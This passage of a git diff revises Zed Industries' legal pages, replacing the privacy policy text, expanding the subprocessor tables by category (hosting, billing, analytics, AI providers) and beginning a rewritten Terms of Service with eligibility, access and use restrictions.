accessing your account. Although we work to protect the security of your account and other data that we hold in our records, be aware that no method of transmitting data over the internet or storing data is completely secure. +- To meet legal obligations: Complying with tax, accounting, and regulatory requirements; -## Data Retention +- To process payments: Completing transactions through our payment processor; and -We retain Personal Data about you for as long as reasonably necessary to provide you with our Services or otherwise in support of our business or commercial purposes for utilization of your Personal Data, as expressed. When establishing a retention period for particular categories of data, we consider who we collected the data from, our need for the Personal Data, why we collected the Personal Data, and the sensitivity of the Personal Data. In some cases we retain Personal Data for a longer period, if doing so is necessary to comply with our legal obligations, resolve disputes or collect fees owed, or as is otherwise permitted or required by applicable law, rule or regulation. We may further retain information in an anonymous or aggregated form where such information would not identify you personally. +- To understand aggregate usage: Generating anonymized statistics to guide product decisions. -For example: +We do not use your personal data for purposes materially different from those described above without providing you notice and, where required by law, obtaining your consent. -- We retain your profile information and credentials for as long as you have an account with us. -- We retain your payment data for as long as we need to process your purchase or subscription. -- We retain your device/IP data for as long as we need it to ensure that our systems are working appropriately, effectively and efficiently. +## Legal Bases for Processing European Personal Data -It's worth noting that we avoid retaining data unless necessary to provide our Service. For example: +If you are located in the European Economic Area (“**EEA**”) or the United Kingdom (“**UK**”), we only process your personal data when we have a valid “legal basis,” including as set forth below. -- We do not currently store source code that we proxy during collaboration sessions. -- We do not currently store audio or video recordings of Collaboration calls handled by LiveKit. +- **Consent** - We may process your personal data where you have consented to certain processing of your personal data. For example, we may process your personal data to send you marketing communications or to use Cookies where you have consented to such use. -## Personal Data of Children +- **Contractual Necessity** - We may process your personal data where required to provide you with our products and services. For example, we may need to process your personal data to respond to your inquiries or requests. -We do not knowingly collect or solicit Personal Data from children under 13 years of age; if you are a child under the age of 13, please do not attempt to register for or otherwise use the Services or send us any Personal Data. If we learn we have collected Personal Data from a child under 13 years of age, we will delete that information as quickly as possible. If you believe that a child under 13 years of age may have provided Personal Data to us, please contact us at hi@zed.dev. +- **Compliance with a Legal Obligation** - We may process your personal data where we have a legal obligation to do so. For example, we may process your personal data to comply with tax, labor and accounting obligations. -## California Resident Rights +- **Legitimate Interests** - We may process your personal data where we or a third party have a legitimate interest in processing your personal data. Specifically, we have a legitimate interest in using your personal data for product development and internal analytics purposes, and otherwise to improve the safety, security, and performance of our products and services. We only rely on our or a third party’s legitimate interests to process your personal data when these interests are not overridden by your rights and interests. -If you are a California resident, you have the rights set forth in this section. Please see the "Exercising Your Rights" section below for instructions regarding how to exercise these rights. Please note that we may process Personal Data of our customers' end users or employees in connection with our provision of certain services to our customers. If we are processing your Personal Data as a service provider, you may contact the entity that collected your Personal Data in the first instance to address your rights with respect to such data as desired. +## How We Disclose the Personal Data We Collect -If there are any conflicts between this section and any other provision of this Privacy Policy and you are a California resident, the portion that is more protective of Personal Data shall control to the extent of such conflict. If you have any questions about this section or whether any of the following rights apply to you, please contact us at hi@zed.dev. +The disclosures described below relate to Zed’s processing as a data controller. When we process data on behalf of Zed Business customers as a data processor, some of the third-parties described below may act as sub-processors under our Data Processing Agreement. -### Access +- **Zed does not sell your personal data to third-parties**.  We also do not share your data with third-parties for the purposes of cross-context advertising. -You have the right to request certain information about our collection and use of your Personal Data over the past 12 months. In response, we will provide you with the following information: +- **Partners and Affiliates** - We may share information we receive to our current or future affiliates (companies under common ownership with Zed) for any of the lawful business purposes described in this Privacy Policy above. -- The categories of Personal Data that we have collected about you. -- The categories of sources from which that Personal Data was collected. -- The business or commercial purpose for collecting or selling your Personal Data. -- The categories of third parties with whom we have shared your Personal Data. -- The specific pieces of Personal Data that we have collected about you. -- If we have disclosed your Personal Data to any third parties for a business purpose over the past 12 months, we will identify the categories of Personal Data shared with each category of third party recipient. If we have sold your Personal Data over the past 12 months, we will identify the categories of Personal Data sold to each category of third party recipient. +- **Vendors and Service Providers** - We may disclose information we receive to vendors and service providers retained in connection with operating, maintaining, or monitoring our websites, products, and services for any of the lawful business purposes described in this Privacy Policy above. -### Deletion +- **AI Service Providers** - We may disclose information we receive to vendors that provide artificial intelligence services in connection with our websites, software, or services for legitimate business purposes only, including website performance monitoring and sales and marketing of our products and services. Zed does not utilize third-party services which use this information for AI training purposes. -You have the right to request that we delete the Personal Data that we have collected about you. Under the CCPA, this right is subject to certain exceptions: for e.g., we may need to retain your Personal Data to provide you with the Services or complete a transaction or other action you may have requested, or if deletion of your Personal Data involves disproportionate effort to achieve. If your deletion request is subject to one of these exceptions, we may deny your deletion request to such data. +- **Web Analytics** - We use analytics services such as Amplitude to collect and process certain analytics data related to your use of our websites. These services utilize first-party cookies to collect information about your use of our websites, apps, and online resources via HTTP referrer and/or depending on your choices regarding cookies. Zed does not use third-party tracking cookies that collect your activity for other websites. -### Correction +- **As Required By Law and Similar Disclosures** - We may access, preserve, and disclose your information if we believe doing so is required or appropriate to: -You have the right to request that we correct any inaccurate Personal Data we have collected about you. Under the CCPA, this right is subject to certain exceptions: for example, if we reasonably decide, based on the totality of circumstances related to your Personal Data, that such data is correct. If your correction request is subject to one of these CCPA exceptions, we may deny your request to correct such data. + - Comply with law enforcement requests and legal process, such as a court order or subpoena; + - Respond to your requests; + - Protect your, our, or others’ rights, property, security, or safety; + - Protect against legal liability; or + - Investigate fraud or other unlawful activity. -### Processing of Sensitive Personal Information Opt-Out + For the avoidance of doubt, the disclosure of your information may occur if you post any objectionable, harmful, or illegal content on or through our websites or products and services. -Consumers have certain rights over the processing of their sensitive information. However, we do not intentionally collect sensitive categories of personal information, but it is possible to share sensitive information with us through your use of the Services. It is your responsibility not to share any such sensitive information when you use the Services. +- **Merger, Sale, or Other Asset Transfers** - We may transfer your personal data to service providers, advisors, potential transactional partners, or other third parties in connection with the consideration, negotiation, or completion of a corporate transaction in which we are acquired by or merged with another company or we sell, liquidate, or transfer all or a portion of our assets. -### Personal Data Sales Opt-Out and Opt-In +- **With Your Consent** - We may also disclose your information for other purposes with your permission. -We will not sell your Personal Data, and have not done so over the last 12 months. To our knowledge, we do not sell the Personal Data of minors under 16 years of age. Under the CCPA, California residents have certain rights when a business "shares" Personal Data with third parties for purposes of cross-contextual behavioral advertising. We have shared the foregoing categories of Personal Data for the purposes of cross-contextual behavioral advertising, as applicable. +## Your Choices -Under California Civil Code Sections 1798.83-1798.84, California residents are entitled to contact us to prevent disclosure of Personal Data to third parties for such third parties' direct marketing purposes; in order to submit such a request, please contact us at hi@zed.dev. +- **Marketing Communications** - You can unsubscribe from our promotional emails via the link provided in the emails. Even if you opt out of receiving promotional messages from us, you will continue to receive administrative and security-related messages from us as long as you maintain a Service account. -Your browser may offer you a "Do Not Track" option, which allows you to signal to operators of websites and web applications and services that you do not wish such operators to track certain of your online activities over time and across different websites. Our Services do not support Do Not Track requests at this time. To find out more about "Do Not Track," you can visit [www.allaboutdnt.com](https://www.allaboutdnt.com). +- **Do Not Track** - Because there is no widely-accepted standard on how to respond to “Do Not Track” signals, we instead utilize and honor [Global Privacy Control (GPC)](https://globalprivacycontrol.org/#gpc-spec) as an alternative where and when feasible. -### Exercising Your Rights under CCPA +- **Opting-out of Software Telemetry** - Learn more about telemetry and how to opt out of Software telemetry collection at [https://zed.dev/docs/telemetry](/telemetry) -To exercise the rights described in this Privacy Policy, you or, if you are a California resident, your Authorized Agent (as defined below) can send us a request that (1) provides sufficient information to allow us to adequately verify that you are the person about whom we have collected Personal Data, and (2) describes your request in sufficient detail to allow us to understand, evaluate and respond ( a "Valid Request"). We are not obligated to respond to requests that do not meet these criteria. We will only use Personal Data provided in a Valid Request to verify your identity and complete your request. +- **Disabling Image Loading for Email** - In order to prevent the use of tracking pixels, you may disable image loading in your own email client. -We are committed to respond to Valid Requests within the time frame required by applicable law. We will not charge you a fee for making a Valid Request unless your Valid Request(s) is excessive, repetitive or manifestly unfounded. If we determine that your Valid Request warrants a fee, we will notify you of the fee and explain that decision before completing your request. +## Your Privacy Rights -You may submit a Valid Request using the following methods: +Depending on where you are located, applicable data protection laws may provide you with specific rights regarding your personal data. These may include the right to: -- Email us at: hi@zed.dev +- Request access to the personal data we maintain about you, update, and correct inaccuracies in your personal data, restrict or object to the processing of your personal data, have your personal data anonymized or deleted, as appropriate, or exercise your right to data portability to easily transfer your personal data to another company. -If you are a California resident, you may also authorize an agent (an "Authorized Agent") to exercise your rights on your behalf. +- Withdraw any consent you previously provided to us regarding the processing of your personal data at any time and free of charge. We will apply your preferences going forward and this will not affect the lawfulness of the processing before you withdrew your consent. -### We Will Not Discriminate Against You for Exercising Your Rights +- **Your European Privacy Rights** - If you are located in the European Economic Area (EEA) or the United Kingdom (UK), you may exercise any of the rights described above under GDPR or applicable local data protection law. You also have the right to lodge a complaint with a supervisory authority, including in your country of residence, place of work, or where an incident took place. -We will not discriminate against you for exercising your rights under applicable data protection laws. We will not deny you our goods or services, charge you different prices or rates, or provide you a lower quality of goods and services if you exercise your rights under applicable law. However, we may offer different tiers of our Services, as allowed by applicable law, with varying prices, rates or levels of quality of the goods or services you receive related to the value of Personal Data that we receive from you. +### How to Exercise Your Privacy Rights -# European Union and United Kingdom Data Subject Rights +Regardless of where you are located, you may exercise these rights by contacting us at [privacy@zed.dev](mailto:privacy@zed.dev) or by using the contact details at the end of this Privacy Policy. Please include the subject line "Privacy Request" and include: (1) the specific right you wish to exercise, (2) your account email address, and (3) any details that help us locate your data. -## EU and UK Residents +Before fulfilling your request, we may ask you to provide reasonable information to verify your identity. Zed will respond to these requests without undue delay and in any event, within one month and will execute the request within one month of responding. Complex requests may require an additional 60 days with notice provided to you. -If you are a resident of the European Union ("EU"), United Kingdom ("UK"), Lichtenstein, Norway or Iceland, you may have additional rights under the EU or UK General Data Protection Regulation (the "GDPR") with respect to your Personal Data, as outlined below. -We use the terms "Personal Data" and "processing" as they are defined in the GDPR in this section, but "Personal Data" generally means information that can be used to individually identify a person, and "processing" generally covers actions that can be performed in connection with data such as collection, use, storage and disclosure. Company will be the controller of your Personal Data processed in connection with the Services. -If there are any conflicts between this section and any other provision of this Privacy Policy, the policy or portion that is more protective of Personal Data shall control to the extent of such conflict. If you have any questions about this section or whether any of the following applies to you, please contact us at hi@zed.dev. Note that we may also process Personal Data of our customers' end users or employees in connection with our provision of certain services to you, in which case we are the processor of Personal Data. If we are the processor of your Personal Data, please contact the controller party in the first instance to address your rights with respect to such data. +Please note that there are exceptions and limitations to each of these rights, and that while any changes you make will be reflected in active user databases instantly or within a reasonable period of time, we may retain personal data for backups, archiving, prevention of fraud and abuse, satisfaction of legal obligations, or where we otherwise reasonably believe that we have a legitimate and lawful reason to do so. -## Personal Data We Collect +## Third Parties -The "Categories of Personal Data We Collect" section above details the Personal Data that we collect from you. +Our websites, products, and services may contain links to other websites, products, or services that we do not own or operate or permit you to integrate with third-party services. We are not responsible for the privacy or security practices of these third parties. Please be aware that this Privacy Policy does not apply to your activities on these third-party services or any data you disclose to these third parties. We encourage you to read their privacy policies before providing any data to them. -## Personal Data Use and Processing Grounds +## Retention -The "Our Commercial or Business Purposes for Collecting Personal Data" section above explains how we use your Personal Data. +We keep personal data as long as necessary to provide, maintain, and secure our websites, products, and services. We take measures to avoid retaining data we don't need - for example, we don't store source code proxied during collaboration sessions, or audio, video, and screen contents from calls. -We will only process your Personal Data if we have a lawful basis for doing so. Lawful bases for processing include consent, contractual necessity and our "legitimate interests" or the legitimate interest of others, as further described below. +When you request deletion, we take measures to delete your personal data or anonymize it, unless we're legally required to retain it. We determine retention periods based on the type of service, our relationship with you, legal requirements, and applicable statutes of limitations. -- Contractual Necessity: We process the following categories of Personal Data as a matter of "contractual necessity", meaning that we need to process the data to perform under our End User Terms with you, which enables us to provide you with the Services. When we process data due to contractual necessity, failure to provide such Personal Data will result in your inability to use some or all portions of the Services that require such data. - - Profile or Contact Data - - Payment Data -- Legitimate Interest: We process the following categories of Personal Data when we believe it furthers the legitimate interest of us or third parties: - - Device/IP Data - - Web Analytics - - We may also de-identify or anonymize Personal Data to further our legitimate interests. -- Examples of these legitimate interests include (as described in more detail above): - - Providing, customizing and improving the Services. - - Marketing the Services. - - Corresponding with you. - - Meeting legal requirements and enforcing legal terms. - - Completing corporate transactions. -- Consent: In some cases, we process Personal Data based on the consent you expressly grant to us at the time we collect such data. - - Other Processing Grounds: From time to time we may also need to process Personal Data to comply with a legal obligation, if it is necessary to protect the interests of you or other data subjects, or if it is necessary in the public interest. +## Security -## Sharing Personal Data +Designing Zed and our Service with “secure-by-default” as an objective is of utmost importance to us. We take your security and ours very seriously and strive to follow industry best-practice in order to uphold that principle.  To learn more about Zed’s security program, please visit [https://zed.dev/docs/ai/privacy-and-security](https://zed.dev/docs/ai/privacy-and-security). -The "How We Share Your Personal Data" section above details how we share your Personal Data with third parties. +Zed will notify users as soon as possible should an incident affect their security or privacy. However, because no electronic transmission or storage of data can be proven entirely secure, we can make no guarantees as to the security or privacy of your data. -## EU Data Subject Rights +## Children’s Privacy -For more information about these EU or UK personal data terms and your rights related thereto, or to submit a request for information, please email us at hi@zed.dev. Please note that in some circumstances, we may not be able to fully comply with your request, such as if it is frivolous or impractical, if it jeopardizes the rights of others, or if it is not required by law, but, in those circumstances, we are committed to respond to notify you of such a decision regardless. In some cases, we may also need you to provide us with additional information, which may include Personal Data, if necessary to verify your identity and the nature of your request. +We do not knowingly collect, maintain, or use personal data from children under 18 years of age, and no part of our websites, products, or services is directed to children. If you learn that a child has provided us with personal data in violation of this Privacy Policy, alert us at [privacy@zed.dev](mailto:privacy@zed.dev). -- Access: You can request more information about the Personal Data we hold about you and request a copy of such Personal Data. You can also access certain of your Personal Data by logging on to your account. -- Rectification: If you believe that any Personal Data we are holding about you is incorrect or incomplete, you can request that we correct or supplement such data. You can also correct some of this information directly by logging on to your account. -- Erasure: You can request that we erase some or all of your Personal Data from our systems. -- Withdrawal of Consent: If we are processing your Personal Data based on your consent, you have the right to withdraw your consent at any time. Please note, however, that if you exercise this right, you may have to then provide express consent on a case-by-case basis for the use or disclosure of certain of your Personal Data, if such use or disclosure is necessary to enable you to utilize some or all of our Services. -- Portability: You can ask for a copy of your Personal Data in a machine-readable format. You can also request that we transmit the data to another controller where technically feasible. -- Objection: You can contact us to let us know that you object to the further use or disclosure of your Personal Data for certain purposes, such as for direct marketing purposes. -- Restriction of Processing: You can ask us to restrict further processing of your Personal Data. -- Right to File Complaint: You have the right to lodge a complaint about Company's practices with respect to your Personal Data with the supervisory authority of your country or EU Member State. A list of Supervisory Authorities is available here: [https://edpb.europa.eu/about-edpb/board/members_en](https://edpb.europa.eu/about-edpb/board/members_en) +## International Visitors -## Transfers of Personal Data +Our websites, products, and services are hosted in the United States (“**U.S.**”). If you choose to use our websites or products and services from the EEA, the UK or other regions of the world with laws governing data collection and use that may differ from U.S. law, then please note that you are transferring your personal data outside of those regions to the U.S. for storage and processing. We may transfer personal data from the EEA or the UK to the U.S. and other third countries based on European Commission-approved or UK Government-approved Standard Contractual Clauses, or otherwise in accordance with applicable data protection laws. We may also transfer your data from the U.S. to other countries or regions in connection with storage and processing of data, fulfilling your requests, and operating our websites, products, and services. By providing any data, including personal data, on or to the websites, products, or services, you consent to such transfer, storage, and processing. For more information about the tools that we use to transfer personal data, or to obtain a copy of the contractual safeguards we use for such transfers (if applicable), you may contact us as described below. -The Services are hosted and operated in the United States ("U.S.") through Company and its service providers. By using the Services, you acknowledge that any Personal Data about you is being provided to Company in the U.S. and will be hosted on U.S. servers, and you authorize Company to transfer, store and process your information to and in the U.S., and possibly other countries. In some circumstances, your Personal Data may be transferred to the U.S. pursuant to a data processing agreement incorporating legally required data protection clauses. +## Changes to this Privacy Policy -# Contact Information: +We will post any adjustments to the Privacy Policy on this page, and the revised version will be effective when it is posted. Registered customers will be notified of material privacy policy changes via the email on file with Zed. -If you have additional questions about this Privacy Policy, the methods in which we collect and use your Personal Data or your choices and rights regarding such collection and use, please do not hesitate to contact us at: +## Contact Information -- Website: zed.dev -- Email Address: hi@zed.dev -- Corporate Address: - Zed Industries, Inc. - 2590 Welton St - Suite 200 - PO Box 1916 - Denver CO 80205 +When data is used as outlined in this Privacy Policy, Zed is the data controller and responsible for the processing of your personal data. When Zed processes personal data on behalf of Zed Business customers as a data processor, the terms of our Data Processing Agreement apply. If you have any questions, comments, or concerns about our processing activities, please email us at [privacy@zed.dev](mailto:privacy@zed.dev) or write to us at: -**DATE: May 6, 2025** +Zed Industries, Inc. +2590 Welton St +Suite 200, PO Box 1916 +Denver, CO 80205 diff --git a/legal/subprocessors.md b/legal/subprocessors.md index df3a5f7c9fd1ff5d3fb309a58d58700f8a08681a..7bd95e888473e66e0f9eb232bef1d3e7d67fb802 100644 --- a/legal/subprocessors.md +++ b/legal/subprocessors.md @@ -3,24 +3,100 @@ title: Subprocessor List slug: subprocessors --- -This page provides information about the Subprocessors Zed has engaged to provide processing activities on Customer Data as defined in the [Zed End User Terms](https://zed.dev/terms). - -| Subprocessor | Purpose | Location | -| ------------------- | ------------------------ | ------------- | -| Cloudflare | Cloud Infrastructure | Worldwide | -| Amazon Web Services | Cloud Infrastructure | United States | -| DigitalOcean | Cloud Infrastructure | United States | -| Vercel | Cloud Infrastructure | United States | -| ConvertKit | Email Marketing | United States | -| Axiom | Analytics | United States | -| Hex Technologies | Analytics | United States | -| Snowflake | Analytics | United States | -| LiveKit | Audio/Video Conferencing | United States | -| GitHub | Authentication | United States | -| Anthropic | AI Services | United States | -| BaseTen | AI Services | United States | -| Exa Labs | AI Services | United States | -| Google | AI Services | United States | -| OpenAI | AI Services | United States | - -**DATE: May 6th, 2025** +Zed uses select third-party subprocessors to deliver core product functionality. Each subprocessor processes customer personal data only as necessary to provide its service, and all are subject to appropriate data protection agreements. + +### How Zed Uses Subprocessors + +To provide fast, reliable, and secure functionality, Zed relies on a small number of carefully vetted third-party subprocessors. These vendors help us deliver essential capabilities such as hosting, billing, analytics, real-time collaboration, and hosted AI features. + +Each subprocessor only processes customer personal data as needed to provide its service. + +Zed maintains contracts and data protection agreements with all subprocessors, including GDPR-compliant terms where applicable. We do not sell customer data, and we do not share customer personal data with vendors for advertising or marketing purposes. + +### AI Subprocessors + +Zed offers three modes for AI: + +1. **Bring your own API key** — data goes directly from the customer to the model provider; Zed does not process or store it. +2. [**External Agents**](https://zed.dev/docs/ai/external-agents) — Zed uses ACP to provide an enhanced experience with terminal-based AI code agents like Claude Code or OpenAI Codex. Data is not processed or stored by Zed when using external agents. +3. **Zed-hosted models** — Zed sends customer prompts to one of its AI providers (listed below). These vendors act as subprocessors only for customers who choose this mode. + +### Ongoing Updates + +**Last Updated**: March 2, 2026 + +This subprocessor list is reviewed regularly. Zed will notify customers of material changes in accordance with our [Terms](https://zed.dev/terms) and [Privacy Policy](https://zed.dev/privacy-policy). + +--- + +## Infrastructure & Hosting + +| Subprocessor | Purpose | Data Location | +| ----------------------- | ---------------------------------------- | ------------- | +| **Cloudflare** | Network services, Cloudflare Workers | Global | +| **Amazon Web Services** | Telemetry ingestion pipeline, S3 buckets | United States | +| **DigitalOcean** | Application database hosting | United States | +| **Vercel** | Website and edge infrastructure hosting | United States | + +--- + +## Billing & Payments + +| Subprocessor | Purpose | Data Location | +| ------------ | ------------------------------------------------------------ | ------------- | +| **Stripe** | Payment processing | United States | +| **Orb** | Usage tracking, subscription management, and metered billing | United States | + +--- + +## Operational Tools + +| Subprocessor | Purpose | Data Location | +| ------------ | ------------------------------------- | ------------- | +| **Day.ai** | Customer relationship management | United States | +| **Linear** | Issue tracking and project management | United States | + +--- + +## Email & Communication + +| Subprocessor | Purpose | Data Location | +| -------------- | ---------------------------------------------------------- | ------------- | +| **ConvertKit** | Product update and feature announcement emails | United States | +| **Loops** | Email marketing and product communications | United States | +| **Plain** | Consolidated platform for end-user support across channels | United States | + +--- + +## Analytics & Data Processing + +| Subprocessor | Purpose | Data Location | +| -------------------- | ---------------------------------------------------------------------------------------- | ------------- | +| **Amplitude** | Product analytics | United States | +| **Axiom** | Application telemetry, observability, and logs | United States | +| **Fivetran** | Automates data pipeline integration (extract, transformation, and load services) for Zed | United States | +| **Hex Technologies** | Analytics and debugging | United States | +| **Snowflake** | Data warehouse | United States | + +--- + +## Collaboration Services + +| Subprocessor | Purpose | Data Location | +| ------------ | -------------------------------------------------------------- | ------------- | +| **LiveKit** | Real-time audio/video and collaborative session infrastructure | United States | + +--- + +## AI Services (Zed-Hosted Models) + +_These subprocessors apply only when customers opt to use Zed's hosted AI models. When users supply their own API keys, or use external agents, data is sent directly to the provider and does not pass through Zed's infrastructure._ + +| Subprocessor | Purpose | Data Location | +| ------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------- | +| **Anthropic** | Requests may be sent to Anthropic even if you have another provider's model selected in chat (e.g. for summarization or generating git commit messages). We have a zero data retention agreement with Anthropic. | United States | +| **Baseten** | Inference infrastructure for Edit Predictions | United States | +| **Exa Labs** | AI-powered contextual search and retrieval | United States | +| **Google (Vertex)** | Requests may be sent to Google even if you have another provider's model selected in chat (e.g. for summarization). We have a zero data retention agreement with Google. | United States | +| **OpenAI** | Requests may be sent to OpenAI even if you have another provider's model selected in chat (e.g. for summarization or generating git commit messages). We have a zero data retention agreement with OpenAI. | United States | +| **xAI** | Requests may be sent to xAI even if you have another provider's model selected in chat (e.g. for summarization or generating git commit messages). We have a zero data retention agreement with xAI. | United States | diff --git a/legal/terms.md b/legal/terms.md index 88afa36aa9cb17c55b1b2fe50a26893c4e5a3389..ed90fd36c835ddcc0949a3ad0d49e35fb7e79c8a 100644 --- a/legal/terms.md +++ b/legal/terms.md @@ -1,197 +1,254 @@ --- -title: Zed End User Terms +title: Terms of Service slug: terms --- -PLEASE READ THESE TERMS AND CONDITIONS CAREFULLY BEFORE USING THE SERVICE OR SOFTWARE OFFERED BY ZED INDUSTRIES, INC. ("ZED", OR "WE"). BY ACCESSING OR USING THE SOLUTION (AS DEFINED BELOW) IN ANY MANNER, YOU ("YOU" OR "CUSTOMER") AGREE TO BE BOUND BY THESE TERMS (THE "AGREEMENT") TO THE EXCLUSION OF ALL OTHER TERMS. YOU REPRESENT AND WARRANT THAT YOU HAVE THE AUTHORITY TO ENTER INTO THIS AGREEMENT; IF YOU ARE ENTERING INTO THIS AGREEMENT ON BEHALF OF AN ORGANIZATION OR ENTITY, REFERENCES TO "CUSTOMER" AND "YOU" IN THIS AGREEMENT, REFER TO THAT ORGANIZATION OR ENTITY. IF YOU DO NOT AGREE TO ALL OF THE FOLLOWING, YOU MAY NOT USE OR ACCESS THE SOLUTION IN ANY MANNER. IF THE TERMS OF THIS AGREEMENT ARE CONSIDERED AN OFFER, ACCEPTANCE IS EXPRESSLY LIMITED TO SUCH TERMS. +**Last Updated**: March 2, 2026 -## 1. ACCESS TO AND USE OF THE SOLUTION +Welcome, and thank you for your interest in Zed Industries, Inc. (“**Zed**,” “**we**,” or “**us**”) and our website at [www.zed.dev](https://www.zed.dev), along with our downloadable Zed software (the “**Software**”) and related subscription service (the “**Service**”). These Terms of Service are a legally binding contract between you and Zed regarding your use of the Service. -Subject to the terms and conditions of this Agreement, Zed hereby grants to You, and You hereby accept from Zed, a term-limited, non-exclusive, non-transferable, non-assignable and non-sublicensable license to make use of the Editor for Your internal use only, and subject to the use limitations in Section 2.2. +Please read the following Terms carefully. -## 2. TERMS APPLICABLE TO THE EDITOR +**By accessing or using the Service, you (“You” or “Customer”) agree to these Terms of Service, the Data Processing Addendum (“DPA”), available upon request, and Zed’s [Privacy Policy](/privacy-policy) (collectively, the “Terms”).** -### 2.1. License Grant +If you are not eligible, or do not agree to the Terms, you may not access or use the Service. -Subject to the terms and conditions of this Agreement, Zed hereby grants to You, and You hereby accept from Zed, a term-limited, non-exclusive, non-transferable, non-assignable and non-sublicensable license to make use of the Editor for Your internal use only, and subject to the use limitations in Section 2.2. +By using the Service, you confirm that you have read and understand these Terms and that they form a binding agreement between you and Zed. -### 2.2. License Limitations +**ARBITRATION NOTICE**. Except for certain kinds of disputes described in Section 15.2 (Dispute Resolution and Arbitration), you agree that disputes arising under these Terms will be resolved by binding, individual arbitration, and BY ACCEPTING THESE TERMS, YOU AND ZED ARE EACH WAIVING THE RIGHT TO A TRIAL BY JURY OR TO PARTICIPATE IN ANY CLASS ACTION OR REPRESENTATIVE PROCEEDING. ALTERNATIVELY, CUSTOMER MAY OPT OUT OF ARBITRATION PER SECTION 17.2(a). -You agree that You shall not: (a) exceed the scope of the licenses granted in Section 2.1; (b) make copies of the Editor; (c) distribute, sublicense, assign, delegate, rent, lease, sell, time-share or otherwise transfer the benefits of, use under, or rights to, the license granted in Section 2.1; (d) reverse engineer, decompile, disassemble or otherwise attempt to learn the source code, structure or algorithms underlying the Editor, except to the extent required to be permitted under applicable law; (e) modify, translate or create derivative works of the Editor; or (f) remove any copyright, trademark, patent or other proprietary notice that appears on the Editor or copies thereof. +## 1. Overview -### 2.3. Open Source Software +Subject to these Terms, Zed will permit Customer to access and use Zed’s AI-enabled software-as-a-service offering (the “**Service**”), which enables certain additional features and functionality (including artificial intelligence and collaboration features) in Zed’s open source code editing software (“**Software**”). -Zed makes certain versions of the Editor and related software available at the Zed GitHub Repository: [https://github.com/zed-industries/zed](https://github.com/zed-industries/zed) (the "Repo"). Your use of such software is subject to the open source software licenses declared in the Repo. +## 2. Service -## 3. TERMS APPLICABLE TO THE ZED SERVICE +### 2.1. Eligibility -### 3.1. Access to and Scope of Zed Service +Customer must be at least 18 years old to use the Service. By agreeing to these Terms, Customer represents and warrants to Zed that: (a) Customer is at least 18 years old; (b) Customer has not previously been suspended or removed from the Service; and (c) Customer’s registration and use of the Service is in compliance with any and all applicable laws and regulations. If Customer is an entity, organization, or company, the individual accepting these Terms on Customer’s behalf represents and warrants that they have authority to bind Customer to these Terms and Customer agrees to be bound by these Terms. -If you have elected to use the Zed Service by enabling or activating the Zed Service, Zed will use commercially reasonable efforts to make the Zed Service available to You as set forth in this Agreement. Once you elected to use the Zed Service, You may access and use the Zed Service during the Term, subject to Your compliance with the terms and conditions of the Agreement. +### 2.2. Access Grant -### 3.2. Restrictions +During the Term, subject to Customer’s compliance with the terms of the Terms, Customer may access and use the Service only for Customer’s internal business purposes or for individuals, for personal non-commercial purposes, in accordance with the then-current version of Zed’s usage guidelines and standard technical documentation for the Service that Zed makes generally available to its customers (“**Documentation**”), the Terms, and any terms set forth in the applicable Subscription Service (as defined in Section 3.4 below). Customer agrees to access the Service only through the mechanisms designated by Zed. Without limiting the foregoing, to access the Service, Customer may be required to associate an existing third-party account with the Service to enable authentication (e.g., via OAuth). Customer will be responsible for the acts and omissions of all persons who access the Service through Customer’s account as though such acts and omissions were Customer’s own. Customer will promptly notify Zed if it becomes aware of any compromise to its Zed account. -You will use the Zed Service only in accordance with all applicable laws, including, but not limited to, laws related to data (whether applicable within the United States, the European Union, or otherwise). You agree not to (and will not allow any third party to): (i) remove or otherwise alter any proprietary notices or labels from the Zed Service or any portion thereof; (ii) reverse engineer, decompile, disassemble, or otherwise attempt to discover the underlying structure, ideas, or algorithms of the Zed Service or any software used to provide or make the Zed Service available; or (iii) rent, resell or otherwise allow any third party access to or use of the Zed Service. Zed may suspend Your access to or use of the Zed Service as follows: (a) immediately if Zed reasonably believes Your use of the Zed Service may pose a security risk to or may adversely impact the Zed Service; or (b) if You are in breach of this Agreement. +### 2.3. Acceptable Use -### 3.3. Customer Data +The Service uses technology provided by multiple third party AI subprocessors (the “AI Providers”) including but not limited to: Anthropic, PBC (“Anthropic”), Google LLC (“Google”), LiveKit Incorporated, OpenAI, LLC (“OpenAI”) etc., as may be updated from time to time. Customer may not use the Service in a manner that violates any applicable AI Provider policy which are listed on [https://zed.dev/acceptable-use-policies](https://zed.dev/acceptable-use-policies), including Anthropic’s [Usage Policy](https://www.anthropic.com/legal/aup), Google Gemini’s [Generative AI Prohibited Use Policy](https://policies.google.com/terms/generative-ai/use-policy), GitHub's [Acceptable Use Policy](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies), LiveKit’s [Acceptable Use Policy](https://livekit.io/legal/acceptable-use-policy); OpenAI’s [Usage Policies](https://openai.com/policies/usage-policies/) or [Sharing and Publication Policy](https://openai.com/api/policies/sharing-publication/); and [Community Guidelines](https://openai.com/api/policies/community-guidelines/); each of which may be updated from time to time and are expressly incorporated by reference. Customer is solely responsible to check for updates to the applicable AI Provider policy from time to time. -You are solely responsible for Customer Data including, but not limited to: (a) compliance with all applicable laws and this Agreement; (b) any claims relating to Customer Data; and (c) any claims that Customer Data infringes, misappropriates, or otherwise violates the rights of any third party. You agree and acknowledge that Customer Data may be irretrievably deleted if Your account is terminated. For purposes of this Agreement, "Customer Data" shall mean any data, information or other material provided, uploaded, or submitted by You to the Zed Service in the course of using the Zed Service. Notwithstanding anything to the contrary, You represent and warrant that You will not transfer or make available to Zed any personally identifiable information or related information subject to applicable data privacy laws or regulations, unless otherwise agreed to in writing by Zed. +### 2.4. Restrictions -#### 3.3.1. Customer Data Made Available to Zed +Customer will not (and will not permit anyone else to), directly or indirectly, do any of the following: (a) provide access to, distribute, sell, or sublicense the Service to a third party; (b) seek to access non-public APIs associated with the Service; (c) copy any element of the Service; (d) interfere with the operation of the Service, circumvent any access restrictions, or conduct any security or vulnerability test of the Service; (e) transmit any viruses or other harmful materials to the Service or others; (f) take any action that risks harm to others or to the security, availability, or integrity of the Service except for the purposes of legitimate security or malware research; or (g) access or use the Service or Output in a manner that violates any applicable relevant local, state, federal or international laws, regulations, or conventions, including those related to data privacy or data transfer, international communications, or export of data (collectively, “**Laws**”), or the Terms. The Service incorporates functionality provided by third-party services, the use of which is subject to additional terms. Customer agrees that if Customer accesses or uses services, features or functionality in the Software or Service that are provided by a third party, Customer will comply with any applicable terms promulgated by that third party, including as set forth at [https://zed.dev/acceptable-use-policies](/acceptable-use-policies) (as may be updated from time to time). Customer further acknowledges that certain components of the 